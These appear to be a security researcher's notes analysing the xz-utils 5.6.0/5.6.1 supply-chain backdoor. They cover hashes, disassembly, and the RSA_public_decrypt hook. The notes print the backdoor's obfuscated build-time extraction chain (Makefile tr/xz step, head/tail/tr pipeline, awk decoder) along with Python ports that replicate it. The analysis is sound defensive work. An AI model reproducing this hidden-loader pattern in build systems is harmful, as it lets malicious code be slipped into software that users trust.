this is a much more comprehensive gist, read it instead

https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27

everything below is basically notes from day-of (~march 29 2024)

the openwall email i assume you've read: https://seclists.org/oss-sec/2024/q1/268

i've carved the .o out of both xz-utils 5.6.1 and 5.6.0:
		* xz-utils 5.6.1: xz-5.6.1__liblzma_la-crc64-fast.o
		    sha256: b418bfd34aa246b2e7b5cb5d263a640e5d080810f767370c4d2c24662a274963
		* xz-utils 5.6.0: xz-5.6.0__liblzma_la-crc64-fast.o
		    sha256: cbeef92e67bf41ca9c015557d81f39adaba67ca9fb3574139754999030b83537
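
if you carve the objects yourself, a quick way to compare against the two hashes above is something like the sketch below. the filenames and digests are the ones listed here; the helper names (sha256_of, check) and the assumption that the files sit in the current directory are mine.

```python
import hashlib
from pathlib import Path

# digests quoted in the notes above, keyed by the filenames used there
EXPECTED = {
    "xz-5.6.1__liblzma_la-crc64-fast.o":
        "b418bfd34aa246b2e7b5cb5d263a640e5d080810f767370c4d2c24662a274963",
    "xz-5.6.0__liblzma_la-crc64-fast.o":
        "cbeef92e67bf41ca9c015557d81f39adaba67ca9fb3574139754999030b83537",
}

def sha256_of(path):
    """Return the hex SHA-256 of a file, read in 64 KiB chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def check(directory="."):
    """Map each expected filename to True / False, or None if the file is missing."""
    results = {}
    for name, digest in EXPECTED.items():
        p = Path(directory) / name
        results[name] = (sha256_of(p) == digest) if p.exists() else None
    return results

if __name__ == "__main__":
    labels = {True: "OK", False: "MISMATCH", None: "missing"}
    for name, ok in check().items():
        print(name, labels[ok])
```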
		
in 5.6.0-0.1's liblzma.so you can find the patched _get_cpuid at 0x47f0, which is called from 0x6c24:
		6c24: e8 c7 db ff ff        callq  47f0 <__cxa_finalize@plt+0x250>
		6c29: 89 c2                 mov    %eax,%edx
		6c2b: 48 8d 05 9e fe ff ff  lea    -0x162(%rip),%rax        # 6ad0 <__cxa_finalize@plt+0x2530>
		6c32: 85 d2                 test   %edx,%edx
		6c34: 74 16                 je     6c4c <lzma_crc32@@XZ_5.0+0x5c>
		6c36: 8b 55 e8              mov    -0x18(%rbp),%edx
		6c39: f7 d2                 not    %edx
		6c3b: 81 e2 02 02 08 00     and    $0x80202,%edx      ; -- this is the cpuid mask from crc_x86_clmul.h
		
the mask 0x80202 comes from
			const uint32_t ecx_mask = (1 << 1) | (1 << 9) | (1 << 19);
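
the arithmetic in the listing can be double-checked by hand or with a few lines of python. this is only a sanity check of the numbers quoted above: the feature names for the three bits come from the CPUID leaf 1 ECX layout (bit 1 PCLMULQDQ, bit 9 SSSE3, bit 19 SSE4.1), and the helper names are made up for this sketch.

```python
# CPUID leaf 1, ECX feature bits covered by the mask
PCLMULQDQ = 1 << 1
SSSE3 = 1 << 9
SSE4_1 = 1 << 19
ecx_mask = PCLMULQDQ | SSSE3 | SSE4_1

def call_target(addr, insn):
    """Target of a 5-byte `e8 rel32` near call located at `addr`."""
    assert len(insn) == 5 and insn[0] == 0xE8
    rel32 = int.from_bytes(insn[1:], "little", signed=True)
    # the displacement is relative to the address of the next instruction
    return addr + len(insn) + rel32

def rip_relative(next_insn_addr, disp):
    """Effective address of a disp(%rip) operand."""
    return next_insn_addr + disp

print(hex(ecx_mask))                                          # mask in the `and`
print(hex(call_target(0x6c24, bytes.fromhex("e8c7dbffff"))))  # callq at 6c24
print(hex(rip_relative(0x6c32, -0x162)))                      # lea at 6c2b
```

the three values printed should match 0x80202, 0x47f0 and 0x6ad0 from the disassembly.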
		
but from here i can't see anything related to rtld, so i've clearly missed some relevant details. the hardware watchpoint Andres mentioned is a good idea! with that approach i found that _rtld_global_ro._dl_naudit is set by the movl $0x1,(%rax) at 0x240f7 in the 5.6.0-0.1 liblzma.so. this corresponds to the mov at 0x1661 in liblzma_la-crc64-fast.o.
watching for when _dl_naudit is set back to 0, i see that the function used to hook RSA_public_decrypt is present at address 0x16a90 in liblzma.so, or at the label .Llzma_index_prealloc.o in liblzma_la-crc64-fast.o. the attachment "liblzma_la-crc64-fast.o.gz" mentioned at the end of that page is the liblzma_la-crc64-fast.o from xz-utils 5.6.0.

for reference, the Debian snapshots of the xz-utils source are available at snapshot.debian.org:
	* 5.6.0: https://snapshot.debian.org/package/xz-utils/5.6.0-0.1/
	* 5.6.1: https://snapshot.debian.org/package/xz-utils/5.6.1-1/
		
the email's formatting mangled \t into spaces, but the quoted additional Makefile comments are reproducible. from the email:
	am__test = bad-3-corrupt_lzma2.xz
	...
	am__test_dir=$(top_srcdir)/tests/files/$(am__test)
	...
	# am__dist_setup not mentioned in the email but it's something like...
	# tr "\t \-_" " \t_\-" | xz -d
	sed rpath $(am__test_dir) | $(am__dist_setup) 2>/dev/null
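
to make the "something like" tr step concrete: assuming it really is tr "\t \-_" " \t_\-", it swaps tab with space and '-' with '_' in the bytes of the test file before handing them to xz -d. a minimal python equivalent of just that byte swap (the name unmangle is mine, and the xz -d step is not reproduced):

```python
# assumed equivalent of: tr "\t \-_" " \t_\-"
# tab <-> space and '-' <-> '_'; every other byte passes through unchanged
UNSWAP = bytes.maketrans(b"\t -_", b" \t_-")

def unmangle(data: bytes) -> bytes:
    """Apply the byte swap that precedes `xz -d` in the pipeline."""
    return data.translate(UNSWAP)

if __name__ == "__main__":
    sample = b"a\tb c-d_e"
    print(unmangle(sample))
    # the swap is its own inverse, so applying it twice restores the input
    print(unmangle(unmangle(sample)) == sample)
```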
	
marginally interesting: the script here varies in a few places between 5.6.0 and 5.6.1. relevant snippet, slightly cleaned up and line-wrapped:
		export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
		>/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 &&
		(head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
		head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
		>/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 &&
		(head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
		head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
		>/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 &&
		(head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) &&
		head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
		>/dev/null) && head -c +724)"
		(xz -dc ./tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr
		"\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc
	
in 5.6.1 the last "head" command is head -c +939, "tail" is tail -c +31233, and "tr"'s translation is tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377". the general idea is the same.
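
a sketch of what that pipeline does to the decompressed bytes, up to but not including the final xz -F raw --lzma1 -dc. it assumes each head -c consumes exactly the number of bytes it is asked for and that the input is long enough; the function names and the PARAMS table are made up here, with the numbers copied from the two variants above.

```python
import io

def head_chain(data: bytes, last: int) -> bytes:
    """Emulate `eval $i`: 16 times (skip 1024, keep 2048), then skip 1024, keep `last`."""
    src = io.BytesIO(data)
    out = bytearray()
    for _ in range(16):
        src.read(1024)          # head -c +1024 >/dev/null
        out += src.read(2048)   # head -c +2048
    src.read(1024)
    out += src.read(last)       # head -c +724 (5.6.0) or +939 (5.6.1)
    return bytes(out)

def tail_from(data: bytes, n: int) -> bytes:
    """Emulate `tail -c +n`: output starts at the n-th byte, counting from 1."""
    return data[n - 1:]

def tr_table(ranges) -> bytes:
    """Table for tr SET1 SET2 with SET2 = 0..255: the i-th byte listed in SET1 maps to i."""
    set1 = [b for lo, hi in ranges for b in range(lo, hi + 1)]
    assert sorted(set1) == list(range(256)), "ranges must cover every byte once"
    table = bytearray(256)
    for i, b in enumerate(set1):
        table[b] = i
    return bytes(table)

# octal ranges copied from the two tr invocations
PARAMS = {
    "5.6.0": dict(last=724, tail=31265, ranges=[
        (0o5, 0o51), (0o204, 0o377), (0o52, 0o115),
        (0o132, 0o203), (0o0, 0o4), (0o116, 0o131)]),
    "5.6.1": dict(last=939, tail=31233, ranges=[
        (0o114, 0o321), (0o322, 0o377), (0o35, 0o47),
        (0o14, 0o34), (0o0, 0o13), (0o50, 0o113)]),
}

def carve(decompressed: bytes, version: str) -> bytes:
    """head chain, then tail, then the byte substitution, for the given version."""
    p = PARAMS[version]
    blob = tail_from(head_chain(decompressed, p["last"]), p["tail"])
    return blob.translate(tr_table(p["ranges"]))
```

going by the numbers alone, the head chain keeps 16*2048+724 = 33492 bytes in 5.6.0 and 33707 in 5.6.1, so after the tail the blob fed to the raw lzma1 decoder is 2228 bytes in 5.6.0 and 2475 bytes in 5.6.1.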

in both cases this yields a script like this:
	p="good-large_compressed.lzma"
	if true; then
	N=0
	W=88792
	else
	N=88792
	W=0
	fi
	xz -dc ./tests/files/$p | \
		eval $i `# from above` | \
		LC_ALL=C sed "s/\(.\)/\1\n/g" | \
		LC_ALL=C awk 'BEGIN{FS="\n";RS="\n";ORS="";m=256;for(i=0;i<m;i++){\
			t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l<4096;l++){\
			i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t["x" (NF<1?RS:$1)];\
			i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];printf "%c",(v+k)%m}' | \
		xz -dc --single-stream | \
		((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true
	
that carves bits out of good-large_compressed.lzma, the only difference between 5.6.0 and 5.6.1 being whether it produces an 88792- or 88664-byte .o file.
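
the awk one-liner is easier to follow as a straight port. it is an RC4-like stream transform with a fixed initial state of c[i] = (i*7+5) % 256, 4096 warm-up swaps, and the keystream byte added to the input byte rather than XORed. the python below is my reading of that awk program, not something from the email; the sed step only exists to feed awk one byte per record, so the port works on bytes directly. function names are mine.

```python
def awk_transform(data: bytes) -> bytes:
    """Port of the awk stage: add an RC4-like keystream to each byte, mod 256."""
    m = 256
    # BEGIN block: fixed initial permutation, no key
    c = [(i * 7 + 5) % m for i in range(m)]
    i = j = 0
    # 4096 warm-up rounds that only shuffle the state
    for _ in range(4096):
        i = (i + 1) % m
        a = c[i]
        j = (j + a) % m
        c[i], c[j] = c[j], a
    # main block: i and j carry over from the warm-up
    out = bytearray()
    for v in data:
        i = (i + 1) % m
        a = c[i]
        j = (j + a) % m
        b = c[j]
        c[i], c[j] = b, a
        k = c[(a + b) % m]
        out.append((v + k) % m)
    return bytes(out)

def skip_take(data: bytes, n: int, w: int) -> bytes:
    """Emulate `(head -c +$N >/dev/null) && head -c +$W`: skip n bytes, keep w."""
    return data[n:n + w]
```

the output of awk_transform is what gets piped to xz -dc --single-stream, and skip_take(decompressed, N, W) models the last line of the script that writes liblzma_la-crc64-fast.o.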